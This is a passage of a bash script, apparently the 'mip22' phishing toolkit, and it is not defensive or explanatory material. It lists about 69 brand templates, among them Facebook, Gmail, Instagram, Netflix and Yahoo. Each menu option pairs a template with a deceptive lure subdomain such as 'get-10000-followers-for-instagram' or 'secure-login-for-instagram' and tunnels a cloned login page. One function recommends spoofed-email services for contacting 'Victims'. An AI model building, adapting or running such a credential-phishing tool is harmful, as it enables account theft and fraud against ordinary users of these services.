  493. ${GREEN}[${WHITE}9${GREEN}]${CYAN} Discord ${GREEN}[${WHITE}33${GREEN}]${CYAN} Netflix ${GREEN}[${WHITE}56${GREEN}]${CYAN} Tumblr
  494. ${GREEN}[${WHITE}10${GREEN}]${CYAN} Dota2 ${GREEN}[${WHITE}34${GREEN}]${CYAN} Origin ${GREEN}[${WHITE}57${GREEN}]${CYAN} Twitch
  495. ${GREEN}[${WHITE}11${GREEN}]${CYAN} Dropbox ${GREEN}[${WHITE}35${GREEN}]${CYAN} Outlook ${GREEN}[${WHITE}58${GREEN}]${CYAN} Twitter
  496. ${GREEN}[${WHITE}12${GREEN}]${CYAN} Ebay ${GREEN}[${WHITE}36${GREEN}]${CYAN} Pinterest ${GREEN}[${WHITE}59${GREEN}]${CYAN} Viber Out
  497. ${GREEN}[${WHITE}13${GREEN}]${CYAN} Facebook ${GREEN}[${WHITE}37${GREEN}]${CYAN} Playstation ${GREEN}[${WHITE}60${GREEN}]${CYAN} Vimeo
  498. ${GREEN}[${WHITE}14${GREEN}]${CYAN} Facebook Messenger ${GREEN}[${WHITE}38${GREEN}]${CYAN} Protonmail ${GREEN}[${WHITE}61${GREEN}]${CYAN} Vk
  499. ${GREEN}[${WHITE}15${GREEN}]${CYAN} Facebook Security ${GREEN}[${WHITE}49${GREEN}]${CYAN} Pubg ${GREEN}[${WHITE}62${GREEN}]${CYAN} Whatsapp
  500. ${GREEN}[${WHITE}16${GREEN}]${CYAN} Gmail ${GREEN}[${WHITE}40${GREEN}]${CYAN} Quora ${GREEN}[${WHITE}63${GREEN}]${CYAN} Wordpress
  501. ${GREEN}[${WHITE}17${GREEN}]${CYAN} Goodreads ${GREEN}[${WHITE}41${GREEN}]${CYAN} Reverly ${GREEN}[${WHITE}64${GREEN}]${CYAN} Xanga
  502. ${GREEN}[${WHITE}18${GREEN}]${CYAN} Hotstar ${GREEN}[${WHITE}42${GREEN}]${CYAN} Reddit ${GREEN}[${WHITE}65${GREEN}]${CYAN} Xbox
  503. ${GREEN}[${WHITE}19${GREEN}]${CYAN} Icloud ${GREEN}[${WHITE}43${GREEN}]${CYAN} Reverbnation ${GREEN}[${WHITE}66${GREEN}]${CYAN} Xing
  504. ${GREEN}[${WHITE}20${GREEN}]${CYAN} Influenster ${GREEN}[${WHITE}44${GREEN}]${CYAN} Signal ${GREEN}[${WHITE}67${GREEN}]${CYAN} Yahoo
  505. ${GREEN}[${WHITE}21${GREEN}]${CYAN} Instagram ${GREEN}[${WHITE}45${GREEN}]${CYAN} Skype ${GREEN}[${WHITE}68${GREEN}]${CYAN} Yandex
  506. ${GREEN}[${WHITE}22${GREEN}]${CYAN} Insta Followers ${GREEN}[${WHITE}46${GREEN}]${CYAN} Skyrock ${GREEN}[${WHITE}69${GREEN}]${CYAN} Youtube SUbs
  507. ${GREEN}[${WHITE}23${GREEN}]${CYAN} Insta Followers 2 ${GREEN}[${WHITE}47${GREEN}]${CYAN} Snapchat ${GREEN}[${WHITE}99${GREEN}]${MAGENTA} Main Menu
  508. ${GREEN}[${WHITE}24${GREEN}]${CYAN} Instagram Verify
  509. EOF
  510. read -p "${GREEN}[${WHITE}-${GREEN}]${GREEN} Select an option : ${WHITE}"${WHITE}
  511. case $REPLY in
  512. 1)
  513. site="adobe"
  514. subdomain='http://adobe-pro-membership-lifetime-for-you'
  515. tunnel;;
  516. 2)
  517. site="amazon"
  518. subdomain='http://amazon-pro-membership-lifetime-for-you'
  519. tunnel;;
  520. 3)
  521. site="apple"
  522. subdomain='http://apple-security-account-login'
  523. tunnel;;
  524. 4)
  525. site="badoo"
  526. subdomain='http://get-2000-euro-free-for-your-acount'
  527. tunnel;;
  528. 5)
  529. site="care2"
  530. subdomain='http://get-2000-tokens-free-for-your-acount'
  531. tunnel;;
  532. 6)
  533. site="clashofclans"
  534. subdomain='http://get-free-character-for-clashofclans-game'
  535. tunnel;;
  536. 7)
  537. site="crunchyroll"
  538. subdomain='http://get-free-character-for-crunchyroll-game'
  539. tunnel;;
  540. 8)
  541. site="deviantart"
  542. subdomain='http://deviantart-upgrade-account-pro-for-free'
  543. tunnel;;
  544. 9)
  545. site="discord"
  546. subdomain='http://discord-upgrade-account-pro-for-free'
  547. tunnel;;
  548. 10)
  549. site="dota2"
  550. subdomain='http://dota-upgrade-account-pro-for-free'
  551. tunnel;;
  552. 11)
  553. site="dropbox"
  554. subdomain='http://get-2TB-cloud-storage-free'
  555. tunnel;;
  556. 12)
  557. site="ebay"
  558. subdomain='http://ebay-upgrade-account-for-free'
  559. tunnel;;
  560. 13)
  561. site="facebook"
  562. subdomain='http://secure-verified-account-for-facebook'
  563. tunnel;;
  564. 14)
  565. site="facebook_messenger"
  566. subdomain='http://messenger-premium-features-for-free'
  567. tunnel;;
  568. 15)
  569. site="facebook_security"
  570. subdomain='http://make-your-facebook-secured-from-hackers'
  571. tunnel;;
  572. 16)
  573. site="gmail"
  574. subdomain='http://get-unlimited-google-drive-free'
  575. tunnel;;
  576. 17)
  577. site="goodreads"
  578. subdomain='http://goodreads-updrade-account-lifetime-free'
  579. tunnel;;
  580. 18)
  581. site="hotstar"
  582. subdomain='http://hotstar-premieum-account-for-free'
  583. tunnel;;
  584. 19)
  585. site="icloud"
  586. subdomain='http://get-2TB-cloud-storage-free'
  587. tunnel;;
  588. 20)
  589. site="influenster"
  590. subdomain='http://update-account-to-premium-free'
  591. tunnel;;
  592. 21)
  593. site="instagram"
  594. subdomain='http://secure-login-for-instagram'
  595. tunnel;;
  596. 22)
  597. site="instagram_followers"
  598. subdomain='http://get-10000-followers-for-instagram'
  599. tunnel;;
  600. 23)
  601. site="instagram_followers_2"
  602. subdomain='http://get-10000-followers-for-instagram'
  603. tunnel;;
  604. 24)
  605. site="instagram_verify"
  606. subdomain='http://instagram-verify-account'
  607. tunnel;;
  608. 25)
  609. site="line"
  610. subdomain='http://line-get-free-tokens-for-speech'
  611. tunnel;;
  612. 26)
  613. site="linkedin"
  614. subdomain='http://get-a-premium-plan-for-linkedin-free'
  615. tunnel;;
  616. 27)
  617. site="livejournal"
  618. subdomain='http://get-a-premium-plan-for-livejournal-free'
  619. tunnel;;
  620. 28)
  621. site="mediafire"
  622. subdomain='http://get-2TB-cloud-storage-free'
  623. tunnel;;
  624. 29)
  625. site="mewe"
  626. subdomain='http://mewe-update-account-to-premium-free'
  627. tunnel;;
  628. 30)
  629. site="microsoft"
  630. subdomain='http://unlimited-onedrive-space-for-free'
  631. tunnel;;
  632. 31)
  633. site="mocospace"
  634. subdomain='http://upgrade-your-mocospace-plan-free'
  635. tunnel;;
  636. 32)
  637. site="myspace"
  638. subdomain='http://upgrade-your-myspace-plan-free'
  639. tunnel;;
  640. 33)
  641. site="netflix"
  642. subdomain='http://upgrade-your-netflix-plan-free'
  643. tunnel;;
  644. 34)
  645. site="origin"
  646. subdomain='http://origin-upgrade-to-premium-account-free'
  647. tunnel;;
  648. 35)
  649. site="outlook"
  650. subdomain='http://unlimited-onedrive-space-for-free'
  651. tunnel;;
  652. 36)
  653. site="pinterest"
  654. subdomain='http://get-a-premium-plan-for-pinterest-free'
  655. tunnel;;
  656. 37)
  657. site="playstation"
  658. subdomain='http://playstation-premium-account-free'
  659. tunnel;;
  660. 38)
  661. site="protonmail"
  662. subdomain='http://protonmail-pro-basics-for-free'
  663. tunnel;;
  664. 39)
  665. site="pubg"
  666. subdomain='http://get-free-character-for-pubs-game'
  667. tunnel;;
  668. 40)
  669. site="quora"
  670. subdomain='http://get-quora-premium-account-for-free-lifetime'
  671. tunnel;;
  672. 41)
  673. site="raverly"
  674. subdomain='http://get-raverly-premium-account-for-free-'
  675. tunnel;;
  676. 42)
  677. site="reddit"
  678. subdomain='http://reddit-official-verified-member-badge'
  679. tunnel;;
  680. 43)
  681. site="reverbnation"
  682. subdomain='http://get-reverbnation-premium-account-for-free-'
  683. tunnel;;
  684. 44)
  685. site="signal"
  686. subdomain='http://signal-get-free-tokens-for-speech'
  687. tunnel;;
  688. 45)
  689. site="skype"
  690. subdomain='http://skype-get-free-tokens-for-speech'
  691. tunnel;;
  692. 46)
  693. site="skyrock"
  694. subdomain='http://skyrock-upgrade-to-premium-account-free'
  695. tunnel;;
  696. 47)
  697. site="snapchat"
  698. subdomain='http://view-locked-snapchat-accounts-secretly'
  699. tunnel;;
  700. 48)
  701. site="socialclub"
  702. subdomain='http://-socialclub-update-account-to-premieum-free'
  703. tunnel;;
  704. 49)
  705. site="spotify"
  706. subdomain='http://convert-your-account-to-spotify-premium'
  707. tunnel;;
  708. 50)
  709. site="stackoverflow"
  710. subdomain='http://stackoverflow-convert-your-account-to-premium'
  711. tunnel;;
  712. 51)
  713. site="steam"
  714. subdomain='http://steam-convert-your-account-to-premium'
  715. tunnel;;
  716. 52)
  717. site="tagget"
  718. subdomain='http://tagget-convert-your-account-to-premium'
  719. tunnel;;
  720. 53)
  721. site="telegram"
  722. subdomain='http://telegram-get-free-tokens-for-speech'
  723. tunnel;;
  724. 54)
  725. site="tiktok"
  726. subdomain='http://get-tiktok-100000-followers-free-at-instant'
  727. tunnel;;
  728. 55)
  729. site="tiktok_followers"
  730. subdomain='http://get-tiktok-100000-followers-free-at-instant'
  731. tunnel;;
  732. 56)
  733. site="tumblr"
  734. subdomain='http://tumblr-upgrade-account-to-premium-free'
  735. tunnel;;
  736. 57)
  737. site="twitch"
  738. subdomain='http://unlimited-twitch-tv-user-for-free'
  739. tunnel;;
  740. 58)
  741. site="twitter"
  742. subdomain='http://get-blue-badge-on-twitter-free'
  743. tunnel;;
  744. 59)
  745. site="viber_out"
  746. subdomain='http://viber-get-free-tokens-for-speech'
  747. tunnel;;
  748. 60)
  749. site="vimeo"
  750. subdomain='http://get-100000-views-for-channel-free'
  751. tunnel;;
  752. 61)
  753. site="vk"
  754. subdomain='http://vk-premium-real-method-2022-free'
  755. tunnel;;
  756. 62)
  757. site="whatsapp"
  758. subdomain='http://get-3000-free-tokens-for-free'
  759. tunnel;;
  760. 63)
  761. site="wordpress"
  762. subdomain='http://get-unlimited-wordpress-traffic-free'
  763. tunnel;;
  764. 64)
  765. site="xanga"
  766. subdomain='http://xanga-update-account-to-premieum'
  767. tunnel;;
  768. 65)
  769. site="xbox"
  770. subdomain='http://xbox-premium-account-new-method-2022'
  771. tunnel;;
  772. 66)
  773. site="xing"
  774. subdomain='http://xing-update-account-to-premieum'
  775. tunnel;;
  776. 67)
  777. site="yahoo"
  778. subdomain='http://grab-mail-from-anyother-yahoo-account-free'
  779. tunnel;;
  780. 68)
  781. site="yandex"
  782. subdomain='http://grab-mail-from-anyother-yandex-account-free'
  783. tunnel;;
  784. 69)
  785. site="youtube_subs"
  786. subdomain='http://get-100000-youtube-subscribers-free'
  787. tunnel;;
  788. #70)
  789. #setup_clone_manual
  790. #tunnel;;
  791. 99) menu;;
  792. *)
  793. echo -ne "\n${GREEN}[${WHITE}!${GREEN}]${RED} Invalid Option, Try Again..."
  794. { sleep 0.7; attack;};;
  795. esac
  796. }
  797. attack_manual() {
  798. subdomain='http:secure-login-page'
  799. tunnel_manual
  800. }
  801. email() {
  802. { clear; header; echo; }
  803. echo -ne "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Use this services for send email to Victims \n"
  804. echo -ne "\n${GREEN}[${WHITE}-${GREEN}]${CYAN} https://www.guerrillamail.com/ \n"
  805. echo -ne "\n${GREEN}[${WHITE}-${GREEN}]${CYAN} https://emkei.cz/ ${MAGENTA} (recommended) \n"
  806. echo -ne "\n${GREEN}[${WHITE}-${GREEN}]${CYAN} https://mailspre.com/ \n"
  807. echo -ne "\n\n"
  808. cat <<- EOF
  809. ${GREEN}[${WHITE}99${GREEN}]${CYAN} Main Menu
  810. EOF
  811. read -p "${GREEN}[${WHITE}-${GREEN}]${GREEN} Select an option : ${WHITE}"${WHITE}
  812. case $REPLY in
  813. 99) menu;;
  814. *)
  815. echo -ne "\n${RED}[${WHITE}!${RED}]${RED} Invalid Option, Try Again..."
  816. { sleep 0.7; email;};;
  817. esac
  818. }
  819. menu() {
  820. { clear; header; echo; }
  821. cat <<- EOF
  822. ${GREEN}[${WHITE}1${GREEN}]${CYAN} Attack Default
  823. ${GREEN}[${WHITE}2${GREEN}]${CYAN} Attack Manual
  824. ${GREEN}[${WHITE}3${GREEN}]${CYAN} Apis
  825. ${GREEN}[${WHITE}4${GREEN}]${CYAN} Email
  826. ${GREEN}[${WHITE}5${GREEN}]${CYAN} Vpn
  827. ${GREEN}[${WHITE}6${GREEN}]${CYAN} Sound (pc only)
  828. ${GREEN}[${WHITE}0${GREEN}]${ORANGE} Exit
  829. EOF
  830. read -p "${GREEN}[${WHITE}-${GREEN}]${GREEN} Select an option : ${WHITE}"${WHITE}
  831. case $REPLY in
  832. 1) attack;;
  833. 2) attack_manual;;
  834. 3) apis;;
  835. 4) email;;
  836. 5) vpn_setup;;
  837. 6) play_music;;
  838. help) help;;
  839. 0)
  840. echo -ne "\n${GREEN}[${WHITE}!${GREEN}]${ORANGE} Thanks for using mip22 "${WHITE}
  841. sleep 2
  842. clear
  843. exit 1;;
  844. *)
  845. echo -ne "\n${RED}[${WHITE}!${RED}]${RED} Invalid Option, Try Again..."
  846. { sleep 0.7; menu;};;
  847. esac
  848. }
  849. control_c()
  850. {
  851. echo -e "${RESETBG}"
  852. echo -e "${RESETFG}"
  853. clear
  854. exit 1
  855. }
  856. trap control_c SIGINT
  857. check_os_and_install_packages
  858. check_root_and_os
  859. pid_kill
  860. menu